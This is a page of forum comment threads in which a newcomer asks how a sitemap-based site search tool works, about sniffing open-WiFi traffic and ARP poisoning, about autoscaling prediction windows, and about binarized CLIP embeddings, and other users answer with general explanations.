more cricketlover's comments

cricketlover · 2024-05-29T18:49:48 1717008588

I would love to know how some of these APIs work internally.

zerojames · 2024-05-29T22:03:52 1717020232

The code is open source, in case you are interested in reading the source code!

https://github.com/capjamesg/nanosearch/blob/main/nanosearch...

The algorithm of what happens is:

  1. You provide a sitemap.
  2. All URLs in the sitemap are downloaded.
  3. The HTML from each URL is read, extracting the page title, description, and contents.
  4. The contents are processed using a search algorithm. This tool supports TF/IDF and BM25, two commonly-used search algorithms. I use Python packages that implement these since there are many people who have implemented these algorithms reliably.
  5. A link graph is calculated that tracks all links between all pages.
  6. When you run a search, the algorithm you chose (BM25 or TF/IDF) will run to find related documents. This is a keyword search. Then, results are weighed by the number of links to the page. This weight is useful if a site talks a lot about topics with the same keywords; by using links as a ranking factor, posts that are more connected to others will be elevated in search. Google pioneered the idea that links are "votes" on the relevance of content (although this tool doesn't use PageRank like Google).

cricketlover · 2024-05-29T18:29:33 1717007373

How fan we capture unencrypted packets from the network? I thought you had to run tcpdump or something like that to be able to do that. But you won't be able to run tcpdump if you don't have access to the interface (source or destination), no?

chaorace · 2024-05-29T22:40:23 1717022423

I'm speaking in the context of the parent conversation ("unencrypted WiFi packets"). On wireless networks, all devices share the same "wire", so to speak. Normally that traffic is useless when captured due to encryption, but that's not the case on unencrypted (i.e. public) WiFi.

Control8894 · 2024-05-30T21:49:30 1717105770

It doesn't matter if the wifi is encrypted or not. All that matters is that you share the network with an attacker. You can ARP poison just fine, encrypted or open, wifi or wired.

chaorace · 2024-05-30T22:10:43 1717107043

Well, actually... you can only successfully launch an ARP poisoning attack if you're on the same network segment as the impersonated host.

(Yes, I am indeed being pedantic on purpose to prove a point. I offer this parenthetical to you in place of an apology)

cricketlover · 2024-05-24T04:55:06 1716526506

won't there be more noise while predicting just 20s in advance? The longer the duration, the less effects we will see of temporary events like network blips etc. no? sorry I'm new to software engineering and just trying to learn.

wongarsu · 2024-05-24T09:45:12 1716543912

However with a smaller prediction interval you can dampen your autoscaling more. If you predict 20s into the future, react, and 20s later you see how that changed the situation you can afford to spin very few instances up and down each 20s. If you have to predict 5m into the future you might have to take much stronger actions because any effect is delayed by the 5m startup interval.

cyberpunk · 2024-05-24T05:08:43 1716527323

There’s no one answer for it, you need to learn your traffic / resource usage patterns and tune the scaling to match your situation.

No shortcuts really, although a lot of web applications behave “kinda” similar.

Start conservatively and tweak from there.

diroussel · 2024-05-24T22:02:25 1716588145

Faster feedback is the shortcut. And it always works. Faster boot time is lower latency to serve the queue. Faster feedback is stabilising.

cricketlover · 2024-05-24T04:13:42 1716524022

I went through the post and I have absolutely no clue what this person is talking about. But I want to be in a place where I can understand what the person is saying.

How can I reach that point? I was lost at quantized, could understand bit packing, and was even more lost when the author started talking about things like Hamming Distance.

Please help me out. I want to grow my career in this direction.

simonw · 2024-05-24T05:19:15 1716527955

First you need to understand embeddings, and CLIP. I have a detailed guide here that should help you with that: https://simonwillison.net/2023/Oct/23/embeddings/

Then you need to understand binarization. This is a surprisingly effective trick that observes that if you have an embedding vector of, say, 1000 numbers those numbers for many models will be very small floating point numbers that are just above or below zero.

It turns out you can turn those thousand floating point numbers into one thousand single bits where each bit simply represents if the value is above or below zero... and the embedding magic mostly still works!

And instead of the usual cosine distance you can use a much faster hamming distance function to compare two vectors instead.

Once you understand embedding vectors and CLIP that should hopefully make sense.

kelseyfrog · 2024-05-24T05:20:24 1716528024

The part of CLIP[1] that you need to know to understand this is that it embeds text and images into the same space. ie: the word "dog" is close to images of dogs. Normally this space is a high dimensional real space. Think 512-dimensional or 512 floating point numbers. When you want to measure "closeness" between vectors in this space cosine similarity[2] is a natural choice.

Why would you want to quantize values? Well, instead of using a 32-bit float for each dimension, what if you could get away with 1-bit? You would save you 31x the space. Often you'll want to embed millions or billions of pieces of text or images, so the savings represent a huge speed & cost savings and if accuracy isn't impacted too much then it could be worth it.

If you naively clip the floats of an existing model, it severely impacts accuracy. However, if you train a model from scratch that produces binary outputs, then it appears to perform better.

There is one twist. Deep learning models rely on gradient descent to train and binary output doesn't produce useful gradients. We use cosine similarity on floating point vectors and hamming distance on bit vectors. Is there a function that behaves like hamming distance but is nicely differentiable? We can then use this function during training and then vanilla hamming distance during inference. It seems like they've done that.

I'd suggest playing around with OpenCLIP[3]. My background is in data science but all my CLIP knowledge comes from doing a side project over the course of a couple weekends.

1. https://huggingface.co/docs/transformers/model_doc/clip

2. https://en.wikipedia.org/wiki/Cosine_similarity

3. https://github.com/mlfoundations/open_clip